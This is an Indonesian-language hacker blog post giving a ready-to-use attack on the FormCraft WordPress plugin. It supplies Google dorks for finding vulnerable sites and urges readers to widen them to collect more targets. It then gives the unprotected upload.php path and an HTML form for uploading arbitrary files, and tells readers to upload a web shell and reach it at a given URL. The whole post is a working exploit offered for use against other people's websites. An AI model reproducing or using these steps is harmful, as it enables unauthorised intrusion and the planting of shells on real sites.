Hai gaes ketemu lagi sama Mr.Greatskiller
udah lama gak post
Biasa faktor males :v
Langsung ae
Dork :
- inurl:"wp-content//plugins/formcraft/"
- inurl:"wp-content//plugins/formcraft/" site:.de
(sisanya kembangin lagi ya Om dorknya, biar dapet banyak web Vuln and Verawan :v wkwkw )
Exploit :
1. wp-content/plugins/formcraft/file-upload/server/php/upload.php
2. wp-content/plugins/formcraft/file-upload/server/php/
Script CSRF :
<br />
<form action="http://www.target.co.li/wp-content/plugins/formcraft/file-upload/server/php/upload.php" enctype="multipart/form-data" method="POST">
<input name="files[]" type="file" /><button>Upload</button>
</form>
*Save AS: .html
*ganti target.co.li ~> menjadi url link target sobat
Cari target menggunakan dork di atas
Lalu masukkan exploitnya
Sekarang tinggal apa ? Ya lo masukin target csrf lah lu upload shell atau script lo
Shell Access :
target.co.li/wp-content/plugins/formcraft/file-upload/server/php/files/namashell.php